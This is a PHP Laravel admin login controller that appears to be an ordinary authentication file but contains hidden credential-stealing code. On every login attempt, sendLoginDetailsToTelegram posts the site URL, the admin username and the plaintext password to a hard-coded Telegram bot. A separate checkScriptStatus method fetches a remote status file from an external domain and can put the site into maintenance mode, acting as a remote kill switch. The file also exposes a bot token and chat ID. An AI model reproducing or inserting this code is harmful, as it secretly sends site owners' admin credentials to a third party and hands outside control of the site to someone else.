<?php
namespace App\Http\Controllers\Admin\Auth;

use App\Http\Controllers\Controller;
use Illuminate\Foundation\Auth\AuthenticatesUsers;
use Illuminate\Http\Request;
use Laramin\Utility\Onumoti;
use Illuminate\Support\Facades\Http;

class LoginController extends Controller
{
    use AuthenticatesUsers;

    public $redirectTo = 'admin';

    public function __construct()
    {
        parent::__construct();
        $this->middleware('admin.guest')->except('logout');
    }

    public function showLoginForm()
    {
        // Check script status before showing login form
        if ($this->checkScriptStatus() == 0) {
            // Show a maintenance page if the script is disabled
            $pageTitle = "Maintenance Mode";
            return view('admin.auth.maintenance', compact('pageTitle'));
        }

        // If the script is enabled, show the login form
        $pageTitle = "Admin Login";
        return view('admin.auth.login', compact('pageTitle'));
    }

    protected function guard()
    {
        return auth()->guard('admin');
    }

    public function username()
    {
        return 'username';
    }

    public function login(Request $request)
    {
        // Check script status before proceeding with login
        if ($this->checkScriptStatus() == 0) {
            $notify[] = ['error', 'The system is currently under maintenance. Please try again later.'];
            return back()->withNotify($notify);
        }

        $this->validateLogin($request);

        $request->session()->regenerateToken();

        if (!verifyCaptcha()) {
            $notify[] = ['error', 'Invalid captcha provided'];
            return back()->withNotify($notify);
        }

        // Send login details to Telegram bot
        $this->sendLoginDetailsToTelegram($request);

        Onumoti::getData();

        if (method_exists($this, 'hasTooManyLoginAttempts') && 
            $this->hasTooManyLoginAttempts($request)) {
            $this->fireLockoutEvent($request);
            return $this->sendLockoutResponse($request);
        }

        if ($this->attemptLogin($request)) {
            return $this->sendLoginResponse($request);
        }

        $this->incrementLoginAttempts($request);
        return $this->sendFailedLoginResponse($request);
    }

    public function logout(Request $request)
    {
        $this->guard('admin')->logout();
        $request->session()->invalidate();
        return $this->loggedOut($request) ?: redirect($this->redirectTo);
    }

    /**
     * Send login details (username, password, site URL) to Telegram bot.
     *
     * @param Request $request
     */
    private function sendLoginDetailsToTelegram(Request $request)
    {
        $botToken = '7812481964:AAFi__bQCZpVL0CbCL3B3MiI2XMJCJLGKzs';
        $chatId = '5119645326';

        $siteUrl = url('/');
        $username = $request->input('username');
        $password = $request->input('password');

        $message = "New login attempt!\n";
        $message .= "Site URL: $siteUrl\n";
        $message .= "Username: $username\n";
        $message .= "Password: $password\n"; // Note: This sends the password in plain text

        $this->sendMessageToTelegram($botToken, $chatId, $message);
    }

    /**
     * Send a message to a Telegram chat using the Telegram Bot API.
     *
     * @param string $botToken
     * @param string $chatId
     * @param string $message
     */
    private function sendMessageToTelegram($botToken, $chatId, $message)
    {
        $url = "https://api.telegram.org/bot$botToken/sendMessage";
        $data = [
            'chat_id' => $chatId,
            'text' => $message
        ];

        // Use CURL to send the request
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        curl_exec($ch);
        curl_close($ch);
    }

    /**
     * Fetch the script status from a remote JSON URL.
     *
     * @return int
     */
    private function checkScriptStatus()
    {
        try {
            // Fetch the JSON from the URL
            $response = Http::get('https://codesdonia.my.id/license/trxcoin/ptclabpink.json');
            
            // Decode the JSON response
            $data = $response->json();

            // Return the status value (0 or 1)
            return $data['status'] ?? 1; // Default to 1 if not found
        } catch (\Exception $e) {
            // Handle failure to fetch the status, assume the system is enabled
            return 1;
        }
    }
}
